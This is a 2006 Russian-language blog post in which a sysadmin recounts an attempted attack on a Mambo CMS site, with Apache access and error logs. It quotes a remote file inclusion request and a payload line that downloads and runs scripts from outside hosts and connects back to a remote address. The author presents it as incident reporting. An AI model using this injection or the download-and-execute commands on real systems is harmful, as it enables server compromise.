атака на мамбу

2006-Aug-03, Thursday 12:39
ypq: (Default)
[personal profile] ypq
мамба - это такой веб-контент-менеджер.
далее может быть интересно только для старого PQHC staff и коллег.

сначала в логе апача на сайте с мамбой появились такие записи:
217.160.92.162 - - [05/Jul/2006:02:47:21 +0600] “GET /thisdoesnotexistahaha.php HTTP/1.1” 404 305 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:47:21 +0600] “GET /mambo/index2.php?option=com_content&do_pdf=1&id=1 HTTP/1.1” 404 296 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:47:21 +0600] “GET /mambo/index.php?option=com_content&do_pdf=1&id=1 HTTP/1.1” 404 295 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:47:22 +0600] “GET /index2.php?option=com_content&do_pdf=1&id=1 HTTP/1.1” 200 2993 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:47:23 +0600] “GET /index.php?option=com_content&do_pdf=1&id=1 HTTP/1.1” 200 7964 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)”
217.160.92.162 - - [05/Jul/2006:02:48:09 +0600] “GET http://212.57.*.*//index2.php?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://209.240.156.100/text.txt?&cmd= HTTP/1.1” 200 606 “-” “-”
217.160.92.162 - - [05/Jul/2006:02:53:10 +0600] “GET http://212.57.*.*//index.php?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://209.240.156.100/text.txt?&cmd= HTTP/1.1” 200 - “-” “-”


внутри text.txt с 209.240.156.100 вот такая строчка (весь text.txt - это скрипт с HTML-тэгами, которые лень тут скринить):
‘wget http://www.pulaingurata.com/a.php;curl http://www.pulaingurata.com/a.php;wget http://209.240.156.100/ping.txt;mv ping.txt temp2006;perl temp2006 65.71.45.25 80;wget http://209.240.156.100/ping;chmod +x ping;./ping 65.71.45.25 80;curl -o ping http://209.240.156.100/ping;chmod +x ping;./ping 65.71.45.25 80;cd /tmp/;curl -o temp2006 http://209.240.156.100/ping.txt;while [ 1 ];do perl temp2006 65.71.45.25 80;done;wget http://209.240.156.100/ping;chmod +x ping;./ping 65.71.45.25 80;curl -o ping http://209.240.156.100/ping;chmod +x ping;./ping 65.71.45.25 80’


все бы ничего, да вот не оказалось там ни wget, ни curl.

поэтому, в error-логе соответственно:
[Wed Jul  5 02:47:21 2006] [error] [client 217.160.92.162] File does not exist: /www/root/thisdoesnotexistahaha.php
[Wed Jul  5 02:47:21 2006] [error] [client 217.160.92.162] File does not exist: /www/root/mambo/index2.php
[Wed Jul  5 02:47:21 2006] [error] [client 217.160.92.162] File does not exist: /www/root/mambo/index.php
wget: not found
curl: not found
wget: not found
mv: rename ping.txt to temp2006: No such file or directory
Can’t open perl script “temp2006”: No such file or directory
wget: not found
chmod: ping: No such file or directory
./ping: not found
curl: not found
chmod: ping: No such file or directory
./ping: not found
curl: not found
Can’t open perl script “temp2006”: No such file or directory
Can’t open perl script “temp2006”: No such file or directory


однако, “процесс пошел” и вот этой последней строчкой про отсутствие temp2006 забил весь раздел с /var. после чего был прибит вместе с мамбой.

ну, Семен Семеныч...

содержимое ping.txt... - домашнее задание для младших соратников PQHC. (вернусь - проверю!)

мораль: а нефиг пользоваться всякой попсой.

upd: (вдогонку) все адреса абсолютно реальны!
Tags:
  • Add Memory
  • Share This Entry
This account has disabled anonymous posting.
If you don't have an account you can create one now.
HTML doesn't work in the subject.
More info about formatting
 
Notice: This account is set to log the IP addresses of everyone who comments.
Links will be displayed as unclickable URLs to help prevent spam.
Page generated 2026-Jan-13, Tuesday 17:18
Powered by Dreamwidth Studios